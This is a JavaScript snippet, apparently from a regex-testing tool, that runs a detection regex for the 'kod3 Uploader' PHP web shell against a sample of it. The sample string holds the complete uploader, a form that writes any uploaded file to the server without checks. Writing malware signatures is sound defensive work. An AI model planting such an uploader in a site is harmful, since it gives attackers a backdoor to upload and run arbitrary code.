const regex = /^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*['"]<title>kod3 uploader<\/title>.{0,70}?multipart\/form-data["']\s*name=["']uploader.{0,240}?\@move_uploaded_file\(\$_files\[["']file['"]\].{0,50}?echo\s*['"]upload\s*successfully.{0,60}?[[:punct:]\s]+$/gis;
// Alternative syntax using RegExp constructor
// const regex = new RegExp('^(?:[[:^print:][:cntrl:]\\s]|GIF89.{0,20})*<\\?(?:php)?\\s*echo\\s*[\'"]<title>kod3 uploader<\\\/title>.{0,70}?multipart\\\/form-data["\']\\s*name=["\']uploader.{0,240}?\\@move_uploaded_file\\(\\$_files\\[["\']file[\'"]\\].{0,50}?echo\\s*[\'"]upload\\s*successfully.{0,60}?[[:punct:]\\s]+$', 'gis')
const str = `<?php
echo "<title>kod3 Uploader</title>";
echo "<form method='post' enctype='multipart/form-data' name='uploader'>";
echo '<input type="file" name="file" ><input name="upl" type="submit" id="upl" value="Upload"></form>';
if(isset(\$_POST['upl'])&&\$_POST['upl']== "Upload"){
if(@move_uploaded_file(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])){
echo 'Upload Successfully ;)<br><br>';
}else{
echo 'Upload failed :(<br><br>';
}
}
?>`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}